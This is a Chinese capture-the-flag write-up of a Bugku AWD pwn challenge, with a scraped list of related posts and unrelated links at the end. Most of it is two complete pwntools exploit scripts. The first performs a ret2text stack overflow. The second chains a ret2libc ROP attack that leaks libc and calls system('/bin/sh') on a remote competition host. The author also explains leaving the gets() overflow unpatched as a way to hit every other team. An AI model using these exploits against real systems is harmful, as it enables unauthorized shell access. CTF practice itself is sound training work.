Bugku S3 AWD排位赛-5 pwn
Bugku S3 AWD排位赛-5 pwn
栈溢出,直接ret2text
from pwn import *context(arch='amd64', os='linux', log_level='debug')file_name = './pwn'li = lambda x : print('\x1b[01;38;5;214m' + x + '\x1b[0m')
ll = lambda x : print('\x1b[01;38;5;1m' + x + '\x1b[0m')context.terminal = ['tmux','splitw','-h']debug = 1
if debug:r = remote('192-168-1-26.awd.bugku.cn', 9999)
else:r = process(file_name)elf = ELF(file_name)def dbg():gdb.attach(r)shell = 0x4006CE
p1 = b'a' * (0x30 + 8) + p64(shell)
r.sendlineafter('Please tell me your name: ', p1)r.interactive()
修漏洞这里笔者直接把execve(“/bin/sh”, 0LL, 0LL);改成execve(0, 0LL, 0LL);,但转念一想,gets这个漏洞大部分人都不会修,所以笔者就直接写了第二份exp,也就是ret2libc
from pwn import *context(arch='amd64', os='linux', log_level='debug')file_name = './pwn'li = lambda x : print('\x1b[01;38;5;214m' + x + '\x1b[0m')
ll = lambda x : print('\x1b[01;38;5;1m' + x + '\x1b[0m')context.terminal = ['tmux','splitw','-h']debug = 1
if debug:r = remote('192-168-1-26.awd.bugku.cn', 9999)
else:r = process(file_name)elf = ELF(file_name)def dbg():gdb.attach(r)
'''
shell = 0x4006CE
p1 = b'a' * (0x30 + 8) + p64(shell)
r.sendlineafter('Please tell me your name: ', p1)
'''puts_got = elf.got['puts']
puts_plt = elf.plt['puts']
main_addr = elf.sym['main']
pop_rdi_ret = 0x00000000004007b3p1 = b'a' * (0x30 + 8) + p64(pop_rdi_ret) + p64(puts_got) + p64(puts_plt) + p64(main_addr)
r.sendlineafter('Please tell me your name: ', p1)puts_addr = u64(r.recvuntil('\x7f')[-6:].ljust(8, b'\x00'))
li('puts_addr = ' + hex(puts_addr))
libc = ELF('../ppp/libc.so.6')
libc_base = puts_addr - libc.sym['puts']bin_sh = libc_base + libc.search(b'/bin/sh').__next__()
system_addr = libc_base + libc.sym['system']
ret = 0x000000000040053e
p2 = b'a' * (0x30 + 8) + p64(ret) + p64(pop_rdi_ret) + p64(bin_sh) + p64(system_addr)
r.sendlineafter('Please tell me your name: ', p2)r.interactive()
结果不出所料,有些队只会修execv,但是不会修gets,所以成功打到全场
Bugku S3 AWD排位赛-5 pwn相关推荐
- Bugku S3 AWD排位赛-4 pwn
Bugku S3 AWD排位赛-4 pwn 吐槽一下,好几个战队什么都没干的突然飞到前10,一轮开始几秒之后一个队直接飞到8千多分,pwn打完一轮从第二轮就打不了了.....对pwn手极度不友好 设计 ...
- Bugku S3 AWD排位赛-2 pwn
Bugku S3 AWD排位赛-2 pwn 保护全开 可以通过s溢出改掉v5,满足条件即可 from pwn import *context(arch='i386', os='linux', log_ ...
- Bugku S3 AWD排位赛-1 pwn
bugku awd s3排位赛1 pwn解 利用格式化漏洞改a64l为system,v4传入/bin/sh即可getshell 因为s只能32,所以偏移可以采用gdb调试出来 from pwn imp ...
- CTF——AWD模式小总结
本文以bugku平台awd比赛来写 awd 比赛平台 一.防御(比赛开始有30分钟防御时间) 比赛开始得到一个 靶机,如下信息ssh 用户名和密码,还有虚拟ip 然后我们ssh 连接进行防御,这里我推 ...
- AWD流程总结-纸上谈兵向
AWD流程 0X01 比赛开始前 登陆平台,查看规则,探索flag提交和获取方式 读根目录 curl flag机 import requests import redata = {'passwd':& ...
- awd文件服务器,AoiAWD--优秀的AWD工具
之前说了,在bugku的AWD比赛中被打惨了,在网上找资料的时候找到一款适合萌新的工具AoiAWD,记录下搭建的过程 搭建准备 1.先对服务器升级一波 sudo apt-get update sudo ...
- 实习渗透工程师面试记录
文章目录 前言 面试流程 面试问题 总结 简历 前言 2021.11.03 上午十一点,经历人生中的第一次面试,面试的企业是广西等保安全测评有限公司,投这家企业是因为我兄弟在广西人才网上投了简历,故来 ...
- 【网络安全】brainpan-windows缓冲区溢出详解
简介 渗透测试 注意: 本文仅用于技术讨论与研究,对于所有笔记中复现的这些终端或者服务器,都是自行搭建的环境进行渗透的.我将使用Kali Linux作为此次学习的攻击者机器.这里使用的技术仅用于学习教 ...
- 记一次bugku awd的pwn解
今天晚上6点30闲得没事,随便逛逛的时候看到了bugku awd有战队开了房间,想着没什么事就报名玩了玩,不过pwn题还是很有意思的. 连上去发现是个堆题...再一看加固时间20分钟....(瞬间无语 ...
最新文章
- U盘安装Ubuntu14.4时遇到分区问题记录
- BZOJ2055 80人环游世界
- JVM中OutOFMemory和StackOverflowError异常代码
- javascript通用验证
- php js多语言切换,php简单实现多语言切换的方法_php技巧
- Java项目部署目录结构与部署方法 打包方法attilax总结 目录 1.1. Java web项目部署目录结构	1 2. Springboot项目的部署结构	2 3. Java项目的开发模式下目录
- 优化算法 | 多车型车辆路径问题-初始解构造方法
- zabbix监控华为USG6000防火墙
- 红巨星粒子插件Trapcode Suite 14.0 Win版全套中文完美汉化版...
- matlab中pid参数整定,基于MATLAB/Simulink的PID参数整定
- 现代密码学常用符号总结
- 基于无线发射接收物体远离报警器的设计
- VSCode去除.pytest_cache文件夹
- Elasticsearch:Apache spark 大数据集成
- 关于我所上传资源的相关问题
- 极客战记[森林]CHALLENGE:MAGIC EXAM
- Visual Studio Professional 2015 简体中文专业版
- Java 基本数据类型转换
- Mybatis-plus:${ew.sqlselect}用法
- OpenCV C++实现 图片批量重命名、格式转换
热门文章
- 创意的数字橱窗互动装置总有一款你喜欢
- spite用法 java_in spite of的用法是什么?
- 流媒体服务器搭建亲测有效(srs)
- 银行客户端为什么那么差
- 【插件】谷歌浏览器插件 visio在线打开vsdx文件 .vsdx文件在线查看
- 通过iclutch、以及class-dump逆向出ios上app的类定义及头文件
- 我把全国旅游数据用Python爬下来后发现,这个地方才是真正的旅游胜地
- python中read() readline()以及readlines()对比(转)
- CVE-2016-3081
- 微信小程序图片设置圆角会先闪一下才变成圆角